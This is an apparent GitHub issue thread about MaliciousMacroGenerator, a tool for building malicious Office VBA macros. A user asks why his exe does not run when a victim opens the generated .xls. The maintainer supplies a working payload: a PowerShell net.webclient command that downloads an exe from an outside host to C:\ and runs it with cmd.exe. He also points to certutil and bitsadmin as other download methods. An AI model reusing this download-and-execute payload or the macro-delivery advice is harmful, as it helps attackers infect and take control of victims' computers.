Mr-Un1k0d3r
commented
7 years ago You cannot embed an exe that way the payload super command if you want to push an exe you should use powershell net.webclient or other built in windows feature such as certutil, bitsadmin ...
Example of a valid payload
(New-object net.webclient).downloadfile("http://something.com/a.exe", "c:\a.exe"); cmd.exe /c c:\a.exe
praveenyadav1602
please write how to use this python script.
i have tried with my custom exe. see images below: step-1 edit wmi-cmd-evasion-process.json http://solutionhunt.org/Capture1.JPG
step-2 copy wmi-cmd-evasion-process.json and r.exe files into MaliciousMacroGenerator directory. http://solutionhunt.org/Capture2.JPG
step-3 execute python script. http://solutionhunt.org/Capture3.JPG
what happend after this so you can see its successfully generate vba file named with tryy2, but my r.exe was 960kb and generated tty2 vba is only 3.5 kb.
create .xls file with this vba, but when opening .xls file exe not executing. why my r.exe not bind with vba?
what i am doing wrong? please write a proper uses of your script, or give a demo.
regards